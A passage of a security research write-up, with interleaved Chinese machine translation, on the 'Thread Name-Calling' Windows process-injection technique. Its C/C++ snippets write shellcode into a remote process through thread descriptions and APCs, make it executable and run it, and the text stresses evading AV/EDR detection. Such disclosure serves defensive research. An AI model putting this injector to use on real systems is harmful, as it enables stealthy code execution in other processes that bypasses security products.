The related APIs have often been misused in variety of different (old and new) injection techniques, and are described in the MITRE database. APC allows for running remote code by hopping onboard an existing thread, and that is stealthier than the common alternative of creating a remote thread. Creating a new thread triggers a kernel callback (PsSetCreateThreadNotifyRoutineEx), often used by kernel-mode components of AV / EDR products for detection.

In addition, APC gives us more freedom in passing parameters to the remote function. In case of a new thread creation, we can pass only one argument – and here we are allowed to use 3.

However, using the plain NtQueueApcThread has a drawback. To add our function to the APC queue, we need to first find the thread that is in an alertable state (waiting for a signal). Our callback is executed only when the thread is alerted. Details on how to approach this obstacle are explained i.e. in the blog post by modexp. Relying on alertable threads limits our choices for the targets, and scanning for them adds some complexity to the injector.

Fortunately, a workaround to this problem appeared since the new types of APC callbacks have been introduced on Windows. They are defined by QUEUE_USER_APC_FLAGS . Since the introduction of this type, the argument ReserveHandle in NtQueueApcThreadEx was replaced with UserApcOption where we can pass such a flag, modifying the function’s behavior. The most interesting from our perspective is Special User APC ( QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC) that allows us to inject into threads that are not necessarily in the alertable state:

Quote from MSDN:

Special user-mode APCs always execute, even if the target thread is not in an alertable state. For example, if the target thread is currently executing user-mode code, or if the target thread is currently performing an alertable wait, the target thread will be interrupted immediately for APC execution. If the target thread is executing a system call, or performing a non-alertable wait, the APC will be executed after the system call or non-alertable wait finishes (the wait is not interrupted).

Note that the potential of the new API for improving injection methods, was already noticed by researchers, and is described, i. e. in this blog by repnz.

This new APC type has also been criticized for the associated risk of introducing stability issues in the application and making it harder to synchronize the threads (i.e. here). However, it should not be a big problem in our case, as we are using it to run a code that is completely independent from the running application and does not use any resources that should create concurrency issues.

The new API supporting the added APC types was officially added in Windows 11 (Build 22000). It is exposed by the function: QueueUserAPC2, which, at the lower level, was implemented by a new version of the well-known NtQueueApcThreadEx. The new function is simply called NtQueueApcThreadEx2 and has the following prototype (source):

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
NTSYSCALLAPI
NTSTATUS
NTAPI
NtQueueApcThreadEx2(
_In_ HANDLE ThreadHandle,
_In_opt_ HANDLE ReserveHandle, // NtAllocateReserveObject
_In_ ULONG ApcFlags, // QUEUE_USER_APC_FLAGS
_In_ PPS_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcArgument1,
_In_opt_ PVOID ApcArgument2,
_In_opt_ PVOID ApcArgument3
);
NTSYSCALLAPI NTSTATUS NTAPI NtQueueApcThreadEx2( _In_ HANDLE ThreadHandle, _In_opt_ HANDLE ReserveHandle, // NtAllocateReserveObject _In_ ULONG ApcFlags, // QUEUE_USER_APC_FLAGS _In_ PPS_APC_ROUTINE ApcRoutine, _In_opt_ PVOID ApcArgument1, _In_opt_ PVOID ApcArgument2, _In_opt_ PVOID ApcArgument3 );
NTSYSCALLAPI
NTSTATUS
NTAPI
NtQueueApcThreadEx2(
    _In_ HANDLE ThreadHandle,
    _In_opt_ HANDLE ReserveHandle, // NtAllocateReserveObject
    _In_ ULONG ApcFlags, // QUEUE_USER_APC_FLAGS
    _In_ PPS_APC_ROUTINE ApcRoutine,
    _In_opt_ PVOID ApcArgument1,
    _In_opt_ PVOID ApcArgument2,
    _In_opt_ PVOID ApcArgument3
    );

It turns out, we can find this API on Windows 10, since build 19045 – which is earlier than the officially supported version.

As this is a relatively new API, associated with a new syscall, using it can also give an opportunity to bypass some of the products that are not yet watching it.

We use this API for a remote function execution in our implementation of Thread Name-Calling. Still, it is possible to implement a (less stealthy) variant of Thread Name-Calling, using the old API, which we will also demonstrate.

RtlDispatchAPC

This function is not a requirement for our technique, but rather a helper that makes the shellcode execution a bit more stealthy.

Once the shellcode is successfully copied into the remote process, we need to run it. We decided to do it by adding its start address to the APC queue of the remote thread. However, since our shellcode is in a private memory rather than in any mapped module, passing its address directly may trigger some alerts. To evade this indicator it is beneficial to use some legitimate function as a proxy. There are multiple functions that allow to pass a callback to be executed. Many of them have been documented extensively by Hexacorn in his blog. Some interesting additions have been noted by modexp blog.
一旦 shellcode 成功复制到远程进程中,我们需要运行它。我们决定通过将其起始地址添加到远程线程的 APC 队列来实现。但是,由于我们的 shellcode 位于私有内存中,而不是在任何映射模块中,因此直接传递其地址可能会触发一些警报。为了规避这个指标,使用一些合法的函数作为代理是有益的。有多个函数允许传递要执行的回调。其中许多已被 Hexacorn 在他的博客中广泛记录。modexp 博客注意到 了一些有趣的补充。

The function RtlDispatchAPC looks like a perfect candidate. It has three arguments, so it is compatible with APC API. The implementation:
函数 RtlDispatchAPC 看起来是一个完美的候选项。它有三个参数,因此与 APC API 兼容。实现:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
void __fastcall RtlDispatchAPC(void (__fastcall *callback)(__int64), __int64 callback_arg, void *a3)
{
__int64 v6 = 72LL;
int v7 = 1;
__int128 v8 = 0LL;
__int128 v9 = 0LL;
__int128 v10 = 0LL;
__int64 v11 = 0LL;
if ( a3 == (void *)-1LL )
{
callback(callback_arg);
}
else
{
RtlActivateActivationContextUnsafeFast(&v6, a3);
callback(callback_arg);
RtlDeactivateActivationContextUnsafeFast(&v6);
RtlReleaseActivationContext(a3);
}
}
void __fastcall RtlDispatchAPC(void (__fastcall *callback)(__int64), __int64 callback_arg, void *a3) { __int64 v6 = 72LL; int v7 = 1; __int128 v8 = 0LL; __int128 v9 = 0LL; __int128 v10 = 0LL; __int64 v11 = 0LL; if ( a3 == (void *)-1LL ) { callback(callback_arg); } else { RtlActivateActivationContextUnsafeFast(&v6, a3); callback(callback_arg); RtlDeactivateActivationContextUnsafeFast(&v6); RtlReleaseActivationContext(a3); } }
void __fastcall RtlDispatchAPC(void (__fastcall *callback)(__int64), __int64 callback_arg, void *a3)
{
  __int64 v6 = 72LL;
  int v7 = 1;
  __int128 v8 = 0LL;
  __int128 v9 = 0LL;
  __int128 v10 = 0LL;
  __int64 v11 = 0LL;

  if ( a3 == (void *)-1LL )
  {
    callback(callback_arg);
  }
  else
  {
    RtlActivateActivationContextUnsafeFast(&v6, a3);
    callback(callback_arg);
    RtlDeactivateActivationContextUnsafeFast(&v6);
    RtlReleaseActivationContext(a3);
  }
}

To make the above function execute our shellcode we need to pass it the following parameters:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
RtlDispatchAPC(shellcodePtr, 0, (void *)(-1))
RtlDispatchAPC(shellcodePtr, 0, (void *)(-1))
RtlDispatchAPC(shellcodePtr, 0, (void *)(-1))

Note that RtlDispatchAPC is not exported by name, but, on the tested versions of Windows, we could find it easily by Ordinal 8.
请注意,RtlDispatchAPC 不是按名称导出的,但是,在经过测试的 Windows 版本上,我们可以通过 Ordinal 8 轻松找到它。

Figure 1 - RtlDispatchAPC among symbols of NTDLL.DLL
Figure 1 – RtlDispatchAPC among symbols of NTDLL.DLL
图 1 – NTDLL.DLL 符号中的 RtlDispatchAPC

Introducing Thread Name-Calling injection
线程名称调用注入简介

Now that we have introduced all the important APIs, let’s dive into the implementation details of Thread Name-Calling. As already mentioned, it is a variant of a technique that allows us to inject a shellcode into a running process (in contrast to the techniques that operate on the process that needs to be freshly created).
现在我们已经介绍了所有重要的 API,让我们深入了解 Thread Name-Call 的实现细节。如前所述,它是一种技术的变体,它允许我们将 shellcode 注入到正在运行的进程中(与对需要新创建的进程进行操作的技术相反)。

Minimal access rights 最小访问权限

Typically, when we want to write a buffer into a process, we need to first open a handle to this process with a write access right (PROCESS_VM_WRITE) – which may be treated as a suspicious indicator. Thread Name-Calling allows us to achieve the write, and remote allocation, without it.

The currently presented implementation requires opening the process handle with the following access rights:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
HANDLE open_process(DWORD processId, bool isCreateThread)
{
DWORD access = PROCESS_QUERY_LIMITED_INFORMATION // required for reading the PEB address
| PROCESS_VM_READ // required for reading back the pointer to the created buffer
| PROCESS_VM_OPERATION // to set memory area executable or/and allocate a new executable memory
;
if (isCreateThread) {
access |= PROCESS_CREATE_THREAD; // to create a new thread where we can pass APC
}
return OpenProcess(access, FALSE, processId);
}
HANDLE open_process(DWORD processId, bool isCreateThread) { DWORD access = PROCESS_QUERY_LIMITED_INFORMATION // required for reading the PEB address | PROCESS_VM_READ // required for reading back the pointer to the created buffer | PROCESS_VM_OPERATION // to set memory area executable or/and allocate a new executable memory ; if (isCreateThread) { access |= PROCESS_CREATE_THREAD; // to create a new thread where we can pass APC } return OpenProcess(access, FALSE, processId); }
HANDLE open_process(DWORD processId, bool isCreateThread)
{
    DWORD access = PROCESS_QUERY_LIMITED_INFORMATION // required for reading the PEB address
        | PROCESS_VM_READ // required for reading back the pointer to the created buffer
        | PROCESS_VM_OPERATION // to set memory area executable or/and allocate a new executable memory
        ;
    if (isCreateThread) {
        access |= PROCESS_CREATE_THREAD; // to create a new thread where we can pass APC
    }
    return OpenProcess(access, FALSE, processId);
}

Depending on our needs, Thread Name-Calling can be implemented in different flavors. In the most stealthy (recommended) variant, we do the remote calls using routines added to the APC queue of an existing thread. However, if we want to run it on older versions of Windows, where the new API for APC is not available, and we can’t find alertable threads in our desired target, we may create an additional thread. In such case, the relevant access right needs to be set on our process handle:
根据我们的需要,线程名称调用可以用不同的风格实现。在最隐蔽(推荐)的变体中,我们使用添加到现有线程的 APC 队列中的例程进行远程调用。但是,如果我们想在旧版本的 Windows 上运行它,而 APC 的新 API 不可用,并且我们在所需的目标中找不到可警报的线程,我们可能会创建一个额外的线程。在这种情况下,需要在我们的流程句柄上设置相关访问权限:

  • PROCESS_CREATE_THREAD

Keep in mind that this change increases the detection ratio of the technique. However, we found some products where it was enough for the bypass.
请记住,此更改会增加技术的检测率。但是,我们发现一些产品足以绕过。

Generally, it is a good practice to minimize the used access rights. Of the ones listed above, we can still avoid using some of them by further refining the implementation. For example:
通常,最好尽量减少使用的访问权限。在上面列出的那些中,我们仍然可以通过进一步完善实现来避免使用其中的一些。例如:

  • PROCESS_QUERY_LIMITED_INFORMATION – can be avoided if we don’t use PEB for the pointer storage (details explained later)
    PROCESS_QUERY_LIMITED_INFORMATION ——如果我们不使用 PEB 作为指针存储,则可以避免(细节将在后面解释)

During the injection, we operate on threads of our target process. Regarding the thread handle, these are the minimal required access rights:
在注入期间,我们对目标进程的线程进行操作。关于线程句柄,以下是所需的最低访问权限

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
DWORD thAccess = SYNCHRONIZE;
thAccess |= THREAD_SET_CONTEXT; // required for adding to the APC queue
thAccess |= THREAD_SET_LIMITED_INFORMATION; // required for setting thread description
DWORD thAccess = SYNCHRONIZE; thAccess |= THREAD_SET_CONTEXT; // required for adding to the APC queue thAccess |= THREAD_SET_LIMITED_INFORMATION; // required for setting thread description
    DWORD thAccess = SYNCHRONIZE;
    thAccess |= THREAD_SET_CONTEXT; // required for adding to the APC queue
    thAccess |= THREAD_SET_LIMITED_INFORMATION; // required for setting thread description

Implementation 实现

As is always the case of with remote shellcode injection, the implementation must cover:
与远程 shellcode 注入一样,实现必须涵盖:

  • writing our buffer into the remote process’ working set
    将缓冲区写入远程进程的工作集
  • making it executable 使其可执行
  • running the implanted code
    运行植入的代码

Remote write with the help of thread description
借助线程描述进行远程写入

Let’s have a look at the details of how the remote allocation, along with remote writing, can be implemented with the help of the APIs mentioned earlier.

  • As we are implementing code injection, we must start by preparing a proper shellcode. Since we got rid of the NULL byte constraint, we only need to ensure that our shellcode will not be blocking the thread it runs on, and that it has a clean exit.
  • From our injector application, we need to select a thread within the target, where we can set a thread description containing our shellcode. If we use the new API with Special User APC, we can pick just any thread, but if we use the old API – we must ensure that the selected thread is alertable.
  • Next, the thread description must be retrieved within the context of the remote process, so that the buffer will be read into the process’ working set. This can be achieved by a remote call of the function:
Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
HRESULT GetThreadDescription(
[in] HANDLE hThread,
[out] PWSTR *ppszThreadDescription // <- we get back the pointer to allocated buffer
);
HRESULT GetThreadDescription( [in] HANDLE hThread, [out] PWSTR *ppszThreadDescription // <- we get back the pointer to allocated buffer );
HRESULT GetThreadDescription(
  [in]  HANDLE hThread,
  [out] PWSTR  *ppszThreadDescription // <- we get back the pointer to allocated buffer
);

Remember that the above function automatically allocates a buffer of a required size on the heap, and then fills it in with the thread description. This gives us the remote write primitive together with remote allocation of a buffer with Read/Write access. The pointer to this new buffer will be filled into the supplied variable ppszThreadDescription.

Therefore, we need to prepare in advance a memory address within the remote process that can be used as *ppszThreadDescription. It must be an area of a pointer size where the called function GetThreadDescription can write back. There are various options to approach it:

  1. find some tiny cave in a writable memory of the remote process
    在远程进程的可写内存中找到一些小洞穴
  2. utilize some unused fields in a PEB of the remote process
    利用远程进程的 PEB 中的一些未使用的字段

We decided to utilize an unused field in a PEB because it is very easy to find and retrieve, but we can later replace it with a cave if needed.

By checking fields in the PEB we can find the following:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
[...]
PVOID SparePointers[2]; // 19H1 (previously FlsCallback to FlsHighIndex)
PVOID PatchLoaderData;
PVOID ChpeV2ProcessInfo; // _CHPEV2_PROCESS_INFO
ULONG AppModelFeatureState;
ULONG SpareUlongs[2]; // ---> unused field, can be utilized to store our pointer
USHORT ActiveCodePage;
USHORT OemCodePage;
USHORT UseCaseMapping;
USHORT UnusedNlsField;
PVOID WerRegistrationData;
PVOID WerShipAssertPtr;
union
{
PVOID pContextData; // WIN7
PVOID pUnused; // WIN10
PVOID EcCodeBitMap; // WIN11
};
[...]
[...] PVOID SparePointers[2]; // 19H1 (previously FlsCallback to FlsHighIndex) PVOID PatchLoaderData; PVOID ChpeV2ProcessInfo; // _CHPEV2_PROCESS_INFO ULONG AppModelFeatureState; ULONG SpareUlongs[2]; // ---> unused field, can be utilized to store our pointer USHORT ActiveCodePage; USHORT OemCodePage; USHORT UseCaseMapping; USHORT UnusedNlsField; PVOID WerRegistrationData; PVOID WerShipAssertPtr; union { PVOID pContextData; // WIN7 PVOID pUnused; // WIN10 PVOID EcCodeBitMap; // WIN11 }; [...]
    [...]
    PVOID SparePointers[2]; // 19H1 (previously FlsCallback to FlsHighIndex)
    PVOID PatchLoaderData;
    PVOID ChpeV2ProcessInfo; // _CHPEV2_PROCESS_INFO

    ULONG AppModelFeatureState;
    ULONG SpareUlongs[2]; // ---> unused field, can be utilized to store our pointer

    USHORT ActiveCodePage;
    USHORT OemCodePage;
    USHORT UseCaseMapping;
    USHORT UnusedNlsField;

    PVOID WerRegistrationData;
    PVOID WerShipAssertPtr;

    union
    {
        PVOID pContextData; // WIN7
        PVOID pUnused; // WIN10
        PVOID EcCodeBitMap; // WIN11
    };
    [...]

The field SpareUlongs looks like a good candidate. We can retrieve its exact offset by dumping the PEB with WinDbg:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
lkd> dt nt!_PEB
[...]
+0x340 SpareUlongs : [5] Uint4B
[...]
lkd> dt nt!_PEB [...] +0x340 SpareUlongs : [5] Uint4B [...]
lkd> dt nt!_PEB
   [...]
   +0x340 SpareUlongs      : [5] Uint4B
   [...]

PEB has read/write access, so by finding an unused field of a pointer size, we have the suitable storage where the remotely called function can write back. Keep in mind, that in the future versions of Windows, those fields may be utilized for some system data structures, so this solution must be adjusted accordingly to the updates.
PEB 具有读/写访问权限,因此通过查找指针大小的未使用字段,我们获得了合适的存储空间,远程调用的函数可以在其中回写。请记住,在未来版本的 Windows 中,这些字段可能用于某些系统数据结构,因此必须根据更新相应地调整此解决方案。

First, we retrieve the address of the remote PEB – we can do it by calling the API NtQuerySystemInformationProcess :

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
// the function getting the remote PEB address:
ULONG_PTR remote_peb_addr(IN HANDLE hProcess)
{
PROCESS_BASIC_INFORMATION pi = { 0 };
DWORD ReturnLength = 0;
auto pNtQueryInformationProcess = reinterpret_cast<decltype(&NtQueryInformationProcess)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationProcess"));
if (!pNtQueryInformationProcess) {
return NULL;
}
NTSTATUS status = pNtQueryInformationProcess(
hProcess,
ProcessBasicInformation,
&pi,
sizeof(PROCESS_BASIC_INFORMATION),
&ReturnLength
);
if (status != STATUS_SUCCESS) {
std::cerr << "NtQueryInformationProcess failed" << std::endl;
return NULL;
}
return (ULONG_PTR)pi.PebBaseAddress;
}
// the function getting the remote PEB address: ULONG_PTR remote_peb_addr(IN HANDLE hProcess) { PROCESS_BASIC_INFORMATION pi = { 0 }; DWORD ReturnLength = 0; auto pNtQueryInformationProcess = reinterpret_cast<decltype(&NtQueryInformationProcess)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationProcess")); if (!pNtQueryInformationProcess) { return NULL; } NTSTATUS status = pNtQueryInformationProcess( hProcess, ProcessBasicInformation, &pi, sizeof(PROCESS_BASIC_INFORMATION), &ReturnLength ); if (status != STATUS_SUCCESS) { std::cerr << "NtQueryInformationProcess failed" << std::endl; return NULL; } return (ULONG_PTR)pi.PebBaseAddress; }
// the function getting the remote PEB address:
ULONG_PTR remote_peb_addr(IN HANDLE hProcess)
{
    PROCESS_BASIC_INFORMATION pi = { 0 };
    DWORD ReturnLength = 0;

    auto pNtQueryInformationProcess = reinterpret_cast<decltype(&NtQueryInformationProcess)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationProcess"));
    if (!pNtQueryInformationProcess) {
        return NULL;
    }
    NTSTATUS status = pNtQueryInformationProcess(
        hProcess,
        ProcessBasicInformation,
        &pi,
        sizeof(PROCESS_BASIC_INFORMATION),
        &ReturnLength
    );
    if (status != STATUS_SUCCESS) {
        std::cerr << "NtQueryInformationProcess failed" << std::endl;
        return NULL;
    }
    return (ULONG_PTR)pi.PebBaseAddress;
}

Having the base address of the PEB, it is enough to add the known offset of the unused field, to get its pointer in the context of the remote process:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
ULONG_PTR get_peb_unused(HANDLE hProcess)
{
ULONG_PTR peb_addr = remote_peb_addr(hProcess);
if (!peb_addr) {
std::cerr << "Cannot retrieve PEB address!\n";
return NULL;
}
const ULONG_PTR UNUSED_OFFSET = 0x340;
const ULONG_PTR remotePtr = peb_addr + UNUSED_OFFSET;
return remotePtr;
}
ULONG_PTR get_peb_unused(HANDLE hProcess) { ULONG_PTR peb_addr = remote_peb_addr(hProcess); if (!peb_addr) { std::cerr << "Cannot retrieve PEB address!\n"; return NULL; } const ULONG_PTR UNUSED_OFFSET = 0x340; const ULONG_PTR remotePtr = peb_addr + UNUSED_OFFSET; return remotePtr; }
ULONG_PTR get_peb_unused(HANDLE hProcess)
{
    ULONG_PTR peb_addr = remote_peb_addr(hProcess);
    if (!peb_addr) {
        std::cerr << "Cannot retrieve PEB address!\n";
        return NULL;
    }
    const ULONG_PTR UNUSED_OFFSET = 0x340;
    const ULONG_PTR remotePtr = peb_addr + UNUSED_OFFSET;
    return remotePtr;
}

As for setting the thread description (a. k. a. name) – we can do it either:

  1. on an existing thread
  2. on a new one, that we just create for this purpose

The name will be retrieved by passing an APC with the function GetThreadDescription to the same thread where it was set (since this function has 2 parameters, and calling via APC we can pass up to 3 parameters, it is a good fit).

Side note: 旁注:

The function GetThreadDescription requires us to pass the handle to the thread which description (name) we want to read. We CAN set the name on a different thread than the one reading it back. But keep in mind that this function will be executed in context of the target process. Therefore, the handle to the thread that we opened in context of the injector process is no longer valid. Using it in context of a different process would require us to duplicate the handle of the named thread. That means, we must extend our access to the target process by setting PROCESS_DUP_HANDLE, so it’s best to avoid it. The alternative scenario is much easier: because we retrieve the name by the named thread itself, it is enough to use the pseudo handle NtCurrentThread()= (-2) , which is always valid while referencing to the current thread by self.

In the first (preferable) scenario, if we utilize the threads already running within the process, we should either:
在第一种(更可取的)场景中,如果我们利用进程中已经运行的线程,我们应该:

  • use the new API for APC, and add our function as the Special User APC (QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC)
    使用 APC 的新 API,并将我们的函数添加为特殊用户 APC () QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC
  • find a thread in an alterable state, so that our function can be called when the thread gets alerted

The thread must be open with (at least) THREAD_SET_CONTEXT | THREAD_SET_LIMITED_INFORMATION access.

In the second scenario, with a newly created thread, if we use it in conjunction with the old API, we also have to ensure that the thread is alertable, so that our APC gets executed. Examples on how to do it:

Any other steps can be done only after our APC gets called. Before that, we don’t have our buffer in the remote process yet, and we also don’t know at what address it would be stored. Therefore, in order to pass the buffer, we need the first APC. And after it is completed and the buffer is written, we need the second APC to be able to run it.
任何其他步骤只有在我们的 APC 被调用才能完成。在此之前,我们还没有在远程进程中拥有缓冲区,我们也不知道它会存储在哪个地址。因此,为了传递缓冲区,我们需要第一个 APC。在它完成并写入缓冲区后,我们需要第二个 APC 才能运行它。

Plain text 纯文本
Copy to clipboard 复制到剪贴板
Open code in new window
在新窗口中打开代码
EnlighterJS 3 Syntax Highlighter
EnlighterJS 3 语法高亮工具
wchar_t* pass_via_thread_name(HANDLE hProcess, const wchar_t* buf, const void* remotePtr)
{
if (!remotePtr) {
std::cerr << "Return pointer not set!\n";
return nullptr;
}
HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT | THREAD_SET_LIMITED_INFORMATION);
if (!hThread || hThread == INVALID_HANDLE_VALUE) {
std::cerr << "Invalid thread handle!\n";
return nullptr;
}
HRESULT hr = mySetThreadDescription(hThread, buf); // customized SetThreadDescription allows to pass a buffer with NULL bytes
if (FAILED(hr)) {
std::cout << "Failed to set thread desc" << std::endl;
return nullptr;
}
if (!queue_apc_thread(hThread, GetThreadDescription, (void*)NtCurrentThread(), (void*)remotePtr, 0)) {
CloseHandle(hThread);
return nullptr;
}
// close thread handle
CloseHandle(hThread);
wchar_t* wPtr = nullptr;
bool isRead = false;
while ((wPtr = (wchar_t*)read_remote_ptr(hProcess, remotePtr, isRead)) == nullptr) {
if (!isRead) return nullptr;
Sleep(1000); // waiting for the pointer to be written;
}
std::cout << "Written to the Thread\n";
return wPtr;
}
wchar_t* pass_via_thread_name(HANDLE hProcess, const wchar_t* buf, const void* remotePtr) { if (!remotePtr) { std::cerr << "Return pointer not set!\n"; return nullptr; } HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT | THREAD_SET_LIMITED_INFORMATION); if (!hThread || hThread == INVALID_HANDLE_VALUE) { std::cerr << "Invalid thread handle!\n"; return nullptr; } HRESULT hr = mySetThreadDescription(hThread, buf); // customized SetThreadDescription allows to pass a buffer with NULL bytes if (FAILED(hr)) { std::cout << "Failed to set thread desc" << std::endl; return nullptr; } if (!queue_apc_thread(hThread, GetThreadDescription, (void*)NtCurrentThread(), (void*)remotePtr, 0)) { CloseHandle(hThread); return nullptr; } // close thread handle CloseHandle(hThread); wchar_t* wPtr = nullptr; bool isRead = false; while ((wPtr = (wchar_t*)read_remote_ptr(hProcess, remotePtr, isRead)) == nullptr) { if (!isRead) return nullptr; Sleep(1000); // waiting for the pointer to be written; } std::cout << "Written to the Thread\n"; return wPtr; }
wchar_t* pass_via_thread_name(HANDLE hProcess, const wchar_t* buf, const void* remotePtr)
{
    if (!remotePtr) {
        std::cerr << "Return pointer not set!\n";
        return nullptr;
    }

    HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT | THREAD_SET_LIMITED_INFORMATION);

    if (!hThread || hThread == INVALID_HANDLE_VALUE) {
        std::cerr << "Invalid thread handle!\n";
        return nullptr;
    }

    HRESULT hr = mySetThreadDescription(hThread, buf); // customized SetThreadDescription allows to pass a buffer with NULL bytes
    if (FAILED(hr)) {
        std::cout << "Failed to set thread desc" << std::endl;
        return nullptr;
    }
    if (!queue_apc_thread(hThread, GetThreadDescription, (void*)NtCurrentThread(), (void*)remotePtr, 0)) {
        CloseHandle(hThread);
        return nullptr;
    }
    // close thread handle
    CloseHandle(hThread);

    wchar_t* wPtr = nullptr;
    bool isRead = false;
    while ((wPtr = (wchar_t*)read_remote_ptr(hProcess, remotePtr, isRead)) == nullptr) {
        if (!isRead) return nullptr;
        Sleep(1000); // waiting for the pointer to be written;
    }
    std::cout << "Written to the Thread\n";
    return wPtr;
}

After the above function finishes, we have our buffer written to the remote process. We also have a pointer to it. That means, the remote write is accomplished.
上述函数完成后,我们将缓冲区写入远程进程。我们还有一个指向它的指针。这意味着,远程写入已完成。

Figure 2 – Remote write with the help of Thread Name
图 2 – 借助 Thread Name 进行远程写入

At this point our payload is already stored in the working set of the remote process. However, it is in a non-executable memory, allocated on the heap.
此时,我们的 payload 已经存储在远程进程的工作集中。但是,它位于分配在堆上的不可执行内存中。

To proceed, we need to do one of these:
要继续,我们需要执行以下操作之一:

  • find an empty cave in executable memory, and copy it there (the most stealthy option, unfortunately, finding a fitting cave is unlikely in practice)
    在可执行内存中找到一个空的洞穴,并将其复制到那里(最隐蔽的选择,不幸的是,在实践中不太可能找到合适的洞穴)
  • allocate a new, executable buffer of a fitting size, and copy it there
    分配一个合适的新可执行缓冲区,并将其复制到该处
  • set on the whole page containing it Read-Write-eXecute (RWX) access rights (we cannot just make it RX: remember that it is a page used for Heap, and there is some other stuff stored along with our buffer)
    set 在包含它的整个页面上进行读写 (RWX) 访问权限(我们不能只让它成为 RX:请记住,它是一个用于 Heap 的页面,并且还有一些其他内容与我们的缓冲区一起存储)

Copying our buffer from the heap into a different memory region can be achieved via APC, by calling the function RtlMoveMemory from ntdll, which has 3 arguments. However, obtaining the executable buffer is more problematic.
可以通过 APC 将缓冲区从堆复制到不同的内存区域,方法是从 ntdll 调用函数 RtlMoveMemory,该函数有 3 个参数。但是,获取可执行缓冲区的问题更大。

None of the proposed solutions is perfect, but they may be sufficient depending on the scenario.
提出的解决方案都不是完美的,但根据情况,它们可能就足够了。

Allocating a new buffer is the cleanest option, but it has some drawbacks. To do it from a remote process, we must call VirtualAllocEx with RWX access – which is suspicious. Calling VirtualAlloc remotely via APC is impossible: this function has 4 arguments, and with the API for APC we can only pass 3.
分配新缓冲区是最干净的选项,但它也有一些缺点。要从远程进程执行此操作,我们必须使用 RWX 访问权限调用 VirtualAllocEx – 这很可疑。通过 APC 远程调用 VirtualAlloc 是不可能的:此函数有 4 个参数,而使用 APC 的 API 时,我们只能传递 3 个参数。

An alternative is to use the buffer that we already have (allocated on the heap), and just change its memory protection. We can do it by calling VirtualProtectEx. Changing the memory protection of the page within the remote process is still suspicious, but the advantage of this method is that it requires fewer steps than the one presented earlier. Again, calling the local equivalent of the function: VirtualProtect remotely has the same problems as calling VirtualAlloc.
另一种方法是使用我们已经拥有的缓冲区(在堆上分配),并更改其内存保护。我们可以通过调用 VirtualProtectEx 来实现。在远程进程中更改页面的内存保护仍然值得怀疑,但这种方法的优点是它需要的步骤比前面介绍的步骤少。同样,远程调用函数的本地等效项 VirtualProtect 与调用 VirtualAlloc 存在相同的问题。

Still, there exists a possibility to do the memory protection or allocation by calling VirtualAlloc/VirtualProtect remotely with the help of ROP (included as one of the options in our PoC code). But this method comes with its own problems, and a different set of suspicious indicators. It requires using API for direct thread manipulation (SuspendThread/ResumeThread, SetThreadContext/GetThreadContext). According to the tests we performed, that raises even more alerts, and will result in our injector being flagged by many AV/EDR products. In addition, allocating executable memory from within the process will fail if it has the DCP (Dynamic Code Prohibited) enabled.
尽管如此,仍有可能在 ROP(作为 PoC 代码中的选项之一)的帮助下通过远程调用 VirtualAlloc/VirtualProtect 来执行内存保护或分配。但这种方法有其自身的问题,以及一组不同的可疑指标。它需要使用 API 进行直接线程操作(SuspendThread/ResumeThreadSetThreadContext/GetThreadContext)。根据我们执行的测试,这会引发更多警报,并将导致我们的喷油器被许多 AV/EDR 产品标记。此外,如果进程启用了 DCP(禁止动态代码),则从进程内部分配可执行内存将失败。

After considering all the pros and cons, we decided to keep things simple and just call VirtualProtectEx. The second snippet illustrates the alternative version, with VirtualAllocEx.
在考虑了所有的优缺点之后,我们决定让事情变得简单,直接调用 VirtualProtectEx。第二个代码片段说明了具有 VirtualAllocEx 的替代版本。

Once our shellcode is in the executable memory region, we are ready to run it. We use another APC to trigger the execution (requires a thread handle with THREAD_SET_CONTEXT access). Additionally, we may use aforementioned function, RtlDispatchAPC, as a proxy to call the injected code.
一旦我们的 shellcode 位于可执行内存区域,我们就可以运行它了。我们使用另一个 APC 来触发执行(需要具有 THREAD_SET_CONTEXT 访问权限的线程句柄)。此外,我们可以使用上述函数 RtlDispatchAPC 作为代理来调用注入的代码。

Snippet illustrating the basic implementation:
说明基本实现的代码段:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
bool run_injected_v1(HANDLE hProcess, void* remotePtr, size_t payload_len)
{
DWORD oldProtect = 0;
if (!VirtualProtectEx(hProcess, remotePtr, payload_len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
std::cout << "Failed to protect!" << std::hex << GetLastError() << "\n";
return false;
}
HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT);
if (!hThread || hThread == INVALID_HANDLE_VALUE) {
std::cerr << "Invalid thread handle!\n";
return false;
}
bool isOk = false;
auto _RtlDispatchAPC = GetProcAddress(GetModuleHandle("ntdll.dll"), MAKEINTRESOURCE(8)); //RtlDispatchAPC;
if (_RtlDispatchAPC) {
if (queue_apc_thread(hThread, _RtlDispatchAPC, shellcodePtr, 0, (void*)(-1))) {
isOk = true;
}
}
CloseHandle(hThread);
return isOk;
}
